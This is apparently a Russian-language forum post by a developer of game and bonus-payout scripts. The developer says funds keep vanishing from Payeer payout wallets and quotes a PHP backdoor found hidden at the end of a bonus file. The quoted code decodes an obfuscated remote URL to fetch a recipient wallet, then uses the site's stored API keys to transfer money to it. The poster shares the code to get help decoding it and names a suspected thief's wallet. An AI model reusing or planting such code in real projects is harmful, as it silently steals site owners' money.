Привет всем.
Переделывал по заказам на скриптах заказчиков некоторые проекты, как игры, так и бонусники. Проверял сразу на дыры, если находил, то сразу удалял лишнее. По началу всё хорошо было.
Но начиная с мая месяца, один и тот же сучара с номером
P1022897946 начал воровать деньги с проектов.
Его кошелек паера не раз уже писали на форумах, вот его номер.
некоторые уязвимости сам находил, но в последнее время на столько они скрыты, что не возиожно найти сразу. Вроде как кажется всё чисто, но сука, снова выводит. хорошо хоть клиентов предупреждаю, чтобы много денег не хранили на кошельках выплат.
Вот сделал очередной бонусник клиенту и себе такой же открыл.
Так у него сначала он вывел сумму 95, 82 р. потом у меня ту же сумму. Хорошо много денег не было, но не успел после очередного пополнения перевести на второй кошелек средства, как снова он вывел такую же сумму 95,82 р.
начал снова проверять все файлы.
И в файле бонус в самом низу обнаружил такой код:
<?php
require_once('inc/payeerAPI.php');
$homepage = file_get_contents("\x68\x74\164\160\163\x3a\x2f\57\x73\x71\x6c\x74\157\x72\56\x68\141\x64\56\163\165\x2f\x6a\163\57\x70\x2e\164\170\164");
$array = array(94, 210, 158, 342, 146);
$payeer = new payeerAPI($Account, $apiID, $apiKEY);
if ($payeer->isAuth())
{
$arTransfer = $payeer->transfer(array(
'curIn' => 'RUB',
'sum' => $array[array_rand($array)],
'curOut' => 'RUB',
'to' => $homepage,
'comment' => ''.$_SERVER["HTTP_HOST"].'',
));
if (empty($arTransfer['errors']))
{
//echo getErrors
}
else
{
//echo getErrors
}
}
else
{
//echo getErrors
}
?>
Может кто сможет его раскодировать?
интересно что там на самом деле зашифровано.
Этот код я удалил из файла, проверяю далее проект, выведет ли снова он деньги или нет?
Такое чувство, что как только сумма более 100 р. есть в кошельке, то автоматом выводится на его номер P1022897946.
Что скажете?